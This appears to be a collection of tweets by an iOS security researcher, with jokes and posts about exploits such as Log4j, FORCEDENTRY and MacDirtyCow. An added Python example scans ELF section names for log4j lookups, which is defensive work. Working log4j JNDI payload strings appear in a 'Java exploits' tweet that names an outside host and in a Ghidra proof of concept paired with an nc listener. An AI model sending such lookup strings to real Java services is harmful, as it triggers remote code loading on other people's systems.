link in bio
⬛⬛⬛⬛⬛🟩🟩🟩🟩🟩🟩
⬛⬛⬛⬛🟩🟩🟩🟩🟩🟩🟩🟩
⬛⬛🟧⬛🟩🟫🟫🟫🟫🟫🟫🟩
⬛⬛🟧⬛🟫🟫🟫🟫🟫🟫🟫🟫
⬛⬛🟧🟧🟫🟧🟩🟧🟧🟩🟧🟫🟧
⬛⬛🟧🟧🟫🟧🟫🟧🟧🟫🟧🟫🟧
⬛⬛⬛🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧
⬛⬛⬛🟩🟩🟧🟧🟫🟫🟧🟧🟩🟩
⬛🟫🟫🟫🟫🟫🟧🟧🟧🟧🟩🟩🟫
🟫🟫🟧🟫🟫🟫🟫🟩🟩🟩🟩🟩🟧
🟫🟧🟧🟧🟫🟫🟧🟫🟫🟩🟩🟧🟧
DS emulation in Augmented Reality:
Displays game as a holographic 3D model.
- DS emulated with melonDS (iOS port from rileytestut's Delta)
- 3D model extracted with scurest's amazing MelonRipper tool
- rendered with iOS
#RealityKit
#AugmentedReality
#AR
I wasn't expecting Minecraft players to discover ANY world-shattering security exploits.
They found TWO just this week:
- Log4j
- NSO iMessage attack using a PDF to emulate 70,000 virtual Redstone torches to build a 64-bit Redstone computer
We truly live in unprecedented times
Heartwarming: Google engineer waited 20 years for her husband when everyone thought him lost at sea
-She told suitors she won't remarry until Google has a coherent messaging strategy
-Every day, she makes a new chat app
-But every night, she cancels it before it rivals iMessage
Made an app that overwrites the iOS system font using CVE-2022-46689.
It works on iOS 16.1.2 and below on unjailbroken devices.
Four fonts are included: DejaVu Sans Condensed, Serif, Mono, and Choco Cooky (because Samsung).
iOS exploits:
builds a 64-bit virtual machine from 70,000 AND/OR/XOR/XAND logic gates inside a corrupted PDF just to run jailbreak code
Java exploits:
${jndi:ldaps://notnow.dev:3389/lol}
Today we're publishing a detailed technical writeup of FORCEDENTRY, the zero-click iMessage exploit linked by Citizen Lab to the exploitation of journalists, activists and dissidents around the world.
Ghidra's vulnerable to log4j:
__attribute__((__section__(".note.${jndi:ldap://127.0.0.1:1234/abc}")))
int a = 1;
int main(){}
$ gcc hello.c
$ nc -l 1234
Load into Ghidra; it connects to 127.0.0.1:1234.
Ghidra 10.0.2, macOS OpenJDK Corretto 11.0.4.11.1
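The Ghidra bug above works because a section name is attacker-controlled data that ends up inside a log4j log message, and vulnerable log4j versions resolve `${...}` lookups inside the message itself; the `nc -l 1234` listener only shows the resulting outbound LDAP connection. As an added example (not code from the tweet, and not part of Ghidra), here is a small scanner that pulls section names out of an ELF64 image and flags any that carry log4j lookup syntax, which is a cheap check to run on untrusted binaries before loading them into a Java-based analysis tool. The `build_elf64` helper exists only so the scanner can run offline on a constructed input; the section names it writes, including the `${jndi:...}` one, are the constructed test data.

```python
"""Added example: flag log4j ${...} lookup syntax in ELF section names.

Not part of the original tweet or of Ghidra. build_elf64() constructs a
minimal ELF64 image (section header table + .shstrtab only) as test input.
"""
import re
import struct

# Log4j lookup syntax. Any prefix is flagged (jndi, env, lower, upper, ...)
# because vulnerable versions also resolve nested forms like ${${lower:j}ndi:...}.
LOOKUP_RE = re.compile(rb"\$\{[^}]*\}")

ELF_HDR = struct.Struct("<16sHHIQQQIHHHHHH")   # Elf64_Ehdr, little-endian
SEC_HDR = struct.Struct("<IIQQQQIIQQ")         # Elf64_Shdr
SHT_PROGBITS, SHT_STRTAB = 1, 3


def build_elf64(section_names):
    """Build a minimal ELF64 image naming the given sections (constructed input)."""
    names = list(section_names) + [".shstrtab"]
    shstrtab = b"\0"                          # index 0 is the empty name
    name_off = {}
    for n in names:
        name_off[n] = len(shstrtab)
        shstrtab += n.encode() + b"\0"
    str_off = ELF_HDR.size                    # string table right after the header
    sh_off = (str_off + len(shstrtab) + 7) & ~7   # 8-byte aligned section header table
    shnum = len(names) + 1                    # +1 for the mandatory null header
    shstrndx = shnum - 1                      # .shstrtab is the last section
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\0" * 8   # ELFCLASS64, LSB, version 1
    ehdr = ELF_HDR.pack(ident, 1, 62, 1, 0, 0, sh_off, 0,
                        ELF_HDR.size, 0, 0, SEC_HDR.size, shnum, shstrndx)
    shdrs = SEC_HDR.pack(0, 0, 0, 0, 0, 0, 0, 0, 0, 0)
    for n in names:
        stype = SHT_STRTAB if n == ".shstrtab" else SHT_PROGBITS
        off, size = (str_off, len(shstrtab)) if n == ".shstrtab" else (0, 0)
        shdrs += SEC_HDR.pack(name_off[n], stype, 0, 0, off, size, 0, 0, 1, 0)
    img = bytearray(ehdr) + shstrtab
    img += b"\0" * (sh_off - len(img))
    return bytes(img + shdrs)


def elf_section_names(data):
    """Return the section names of a little-endian ELF64 image, in table order."""
    if data[:4] != b"\x7fELF" or data[4] != 2 or data[5] != 1:
        raise ValueError("not a little-endian ELF64 file")
    (_, _, _, _, _, _, shoff, _, _, _, _,
     shentsize, shnum, shstrndx) = ELF_HDR.unpack_from(data, 0)
    if shentsize != SEC_HDR.size or shnum == 0 or shstrndx >= shnum:
        raise ValueError("malformed section header table")

    def shdr(i):
        return SEC_HDR.unpack_from(data, shoff + i * shentsize)

    _, stype, _, _, str_off, str_size, *_ = shdr(shstrndx)
    if stype != SHT_STRTAB:
        raise ValueError(".shstrtab is not a string table")
    strtab = data[str_off:str_off + str_size]
    names = []
    for i in range(shnum):
        name_idx = shdr(i)[0]
        end = strtab.find(b"\0", name_idx)
        names.append(strtab[name_idx:end if end != -1 else None])
    return names


def find_lookup_sections(data):
    """Return (section_name, lookup) pairs for sections whose name contains ${...}."""
    hits = []
    for name in elf_section_names(data):
        for m in LOOKUP_RE.finditer(name):
            hits.append((name.decode("latin-1"), m.group(0).decode("latin-1")))
    return hits


if __name__ == "__main__":
    # The section name from the tweet, placed in a constructed ELF image.
    PAYLOAD = ".note.${jndi:ldap://127.0.0.1:1234/abc}"
    sample = build_elf64([".text", ".data", PAYLOAD])
    for sec, lookup in find_lookup_sections(sample):
        print(f"suspicious section {sec!r}: lookup {lookup!r}")
```

The scanner deliberately flags every `${...}`, not just `${jndi:`, because log4j's message lookups compose and a nested form can hide the `jndi` prefix from a naive substring check. It also reads the `.shstrtab` bounds from the header rather than trusting the rest of the file, since the input is by definition untrusted. The actual fix is an updated log4j in whatever tool does the loading; this check only tells you a file is worth treating with suspicion.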
Lost a billion dollars buying a big batch of benzene because I heard the price was about to increase.
My stockpile all evaporated before I could sell it.
Lesson learned: the market can remain irrational longer than your solvent can remain.
Let's be honest: whoever built that iMessage zero-click for NSO is a redstoner.
No-one else looks at a bug that gives AND/OR/XOR/XNOR primitives, and goes,
"let's build a 64-bit computer out of logic gates"!!
New blog post: hardware accelerated virtual machines on a jailbroken iPhone 12 / iOS 14.1
... it's not practical (VMs are limited to 900MB of RAM), but shows iPhone's untapped potential.
Here's Fedora 36 in a modified
@UTMapp
with hardware virtualization:
Stop throwing exceptions
Stacks are not meant to be unwound
Years of C++ yet no real life codebase found with exceptions enabled
Wanna check for errors anyways for a laugh? We had a variable for that: it's called errno
They have played us for absolute fools
Heads up! A lot of the software you’re using might be silently invading your privacy without you even knowing 😱
Don’t fear, though: one thing you can do to help is switching to Linux so your Wi-Fi stops working, blocking all malware🙈
Made an app that removes the three app limit for free provisioning.
Hit "Go" just before installing apps.
Should work on iOS 16.1.2 and below / iOS 15.7.1 and below.
Thanks to XsF1re for figuring out the methods to patch:
Since debilitating sandbox, it would be interesting if we can patch /usr/libexec/installd using MacDirtyCow exploit!
haha
#MacDirtyCow
- Allow installing over-the-air signed apps by free developer certificate.
- Removes the 3 app limit for free developer accounts.
A climate-controlled vault at the United States National Institute of Standards and Technology (NIST) holds the reference critical security bug for calibrating the CVE severity 10.0 score
The iOS SDK was released in 2008 - 13 years ago.
Swift was released in 2014 - 7 years ago.
Swift has been around for more than half of iOS development.
New blog post: I ran the iOS kernel in QEMU emulation to boot into userspace and start launchd. I also wrote a tutorial so you can examine iOS's boot process with virtualization.
New blog post:
Get root on macOS 12.3.1: proof-of-concepts for @LinusHenze's CoreTrust and DriverKit bugs
My proof-of-concepts for:
CVE-2022-26766: CoreTrust allows any root certificate
CVE-2022-26763: IOPCIDevice::_MemoryAccess not checking bounds at all
Stop designing binary formats!
Objects are not meant to be serialized
30-year old mature code in billions of browsers, yet no codec survives 10 minutes of fuzzing
Want to read untrusted data anyways for a laugh? We have a tool for that: it's called "ASN.1"
Protobuf? Moov? NBT??
To think, if you were better at BSing investors, we could've had headlines like
"Kickstarter announces pivot to IPv6"
"Twitter CEO going all-in on IPv6"
"Ubisoft incorporates IPv6 into DLC"
"Iced tea maker rebrands to 'Long Island IPv6 Corp'"
New blog post:
You don’t need expensive equipment for VoLTE/VoWiFi research!
Learn how VoLTE/VoWiFi works by setting up your own Wi-Fi calling server with free software.
"A security issue was discovered in Kubernetes where loading specially-crafted yaml can lead to code execution."
()
That's funny: I've been loading YAML into Kubernetes for a whole day now and it still hasn't executed any code
Ian Beer released his proof-of-concept for CVE-2022-46689 (MacDirtyCow):
His exploit accomplishes two things I didn't know were possible:
- writing the last byte in a 16k page
- take over system daemons
fuck "nixOS". everything i install gets tar xf'd into /bin. raw binaries without the functional shit. no, i will NOT reproduce your build. curl pipe bash. i live for this
Apple updated the iPhone 5S for longer than Microsoft updated their entire mobile platform.
iPhone 5S:
- released Sept 2013
- last update: July 2019 = 6 years
Windows:
- Windows Phone 8 released Oct 2012
- Windows Mobile 10 last update: Oct 2017 = 5 years
iPhone 14 Pro can barely emulate a Nintendo Switch.
It's enough to run a 2D Unity game with some crashes.
The game is , D3fau4's port of .
The emulator is Ryujinx (), wrapped to run on iOS.
Game starts at 00:47.
strongest java library in the world, however, it is so fragile as to execute arbitrary code when handled by any force other than the delicate touch of a lesbian.
STOP RUNNING CONSTRUCTORS AT STARTUP
GLOBAL VARIABLES ARE SUPPOSED TO BE INITIALIZED WITH CONSTANTS
40 years of C++ yet NO defined order for calling global constructors
Want to initialize your variables with code for a laugh? We have a function for that: it's called `main`
Stop optimizing code!
Behaviours are supposed to be defined
50 years of C development yet no real-world use found for strict aliasing
Want to funroll loops anyway for a laugh? We have a tool for that: it's called "Duff's device"
They have taken us for absolute fSegmentation fault
Intel is now extremely cautious when picking names for open source projects, a policy instituted after someone at Intel managed to name their project "PowerTOP"
Please fix this, Twitter. I didn't pay $132,000 to become the cryptographically proven owner of the 1.87GB GIF of the entire Bee Movie just to get a static image in my avatar
The view-source controversy shows that the Open Web must become decentralized to survive.
Thus, I'm proud to announce ViewSourceCoin, my new NFT ICO where
Later today, I will be disclosing a vulnerability that affects C, C++, Rust, Go, Swift, and other languages:
Bad Programmers can use these languages to write terrible code.
Proof-of-concept:
The "billion-dollar-nft-torrent.torrent" from the NFT Bay only has 10GB of data: the rest is a 17TB blank file.
(Proof: , )
Which makes it worth exactly as much as all the NFTs in the world - Zero.
"C is 'portable assembly': we should redefine 'undefined behaviour' to match the hardware, so out-of-bounds access immediately traps", says local Twitter user with a brand-new $1599.99 phone with ARM Memory Tagging Extension
Reminder: the ARM processor in the original iPhone/3G, the 3DS, and the Raspberry Pi Zero can execute Java bytecode natively
TI-Nspire calculator homebrew developers have reverse engineered ARM's Jazelle technology and provided sample code you can run:
Me: tell me the stack layout of varargs you Bell Labs piece of shit
C: can you feel your address space burning? my ABI is beyond anything your FFI can make. you cannot kill me in a way that matters
Me loading libclang, tears streaming down my face: I'm nOT FUCKING SCARED OF YOU